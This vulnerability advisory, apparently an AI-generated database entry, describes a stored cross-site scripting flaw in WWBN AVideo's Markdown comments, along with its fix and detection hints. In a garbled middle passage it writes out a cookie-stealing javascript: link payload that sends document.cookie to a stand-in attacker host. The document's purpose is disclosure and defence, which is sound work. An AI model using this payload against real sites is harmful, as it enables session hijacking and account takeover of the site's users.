
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-27568 is a Stored Cross-Site Scripting (XSS) vulnerability in WWBN AVideo, an open-source video platform, caused by insufficient sanitization of Markdown links in video comments. The vulnerability affects AVideo versions prior to 21.0 and was discovered by Arkadiusz Marta, with the advisory published on February 20, 2026. It carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation). AVideo uses Parsedown v1.7.4 to render Markdown in video comments without enabling Safe Mode or escaping markup, allowing javascript: URI schemes to pass through unsanitized and be rendered as clickable hyperlinks in the browser. An authenticated attacker with low privileges can craft a malicious Markdown comment containing a javascript: URI (e.g., [Click me](javascript:malicious_code())), which is then persistently stored and executed in the context of any user who clicks the link. The fix, applied in commit ade348e, enables $parsedown->setSafeMode(true) and $parsedown->setMarkupEscaped(true) in the markDownToHTML() function within objects/functionsSecurity.php (GitHub Commit, GitHub Advisory).
Because the malicious payload is stored server-side, it persistently affects every user who views and clicks the injected comment link, not just the initial victim. Successful exploitation enables session hijacking (theft of session cookies or tokens), privilege escalation up to and including full administrator account takeover, and data exfiltration from the victim's browser context. Availability is not directly impacted, but the confidentiality and integrity of user accounts and platform data are at significant risk (GitHub Advisory).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of disclosure (GitHub Advisory). The EPSS score is approximately 0.044% (2nd percentile), indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated attacker account (any low-privilege user) and victim interaction (clicking the malicious link), which somewhat limits the attack surface.
javascript: URI as a Markdown link, for example: [Click here for more info](javascript:document.location='https://attacker.com/steal?c='+document.cookie). This payload will steal the victim's session cookie when clicked.javascript: URI is rendered as a clickable hyperlink in the page HTML.javascript: URI strings in the comment body field; repeated access to video pages by accounts that subsequently exhibit anomalous behavior.javascript: URIs (e.g., [text](javascript:...)) in the database or rendered HTML source.Upgrade WWBN AVideo to version 21.0 or later, which enables Parsedown Safe Mode (setSafeMode(true)) and markup escaping (setMarkupEscaped(true)) in the markDownToHTML() function, preventing javascript: URIs from being rendered (AVideo Release 21.0, GitHub Commit). If immediate patching is not possible, manually validate and block unsafe URI schemes (e.g., javascript:, vbscript:) before rendering Markdown content, and enable Parsedown Safe Mode in the application code. Additionally, deploying a strict Content Security Policy (CSP) header that disallows inline script execution can reduce the impact of any successful XSS injection (GitHub Advisory).
The vulnerability was reported by security researcher Arkadiusz Marta and acknowledged by the AVideo maintainer (DanielnetoDotCom), who published the advisory and released the fix on February 20, 2026 (GitHub Advisory). A technical write-up was published on dev.to and infinitsec.net shortly after disclosure, providing additional context on the stored XSS attack vector (dev.to, infinitsec.net). General community reaction has been moderate, consistent with the medium severity rating and absence of active exploitation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."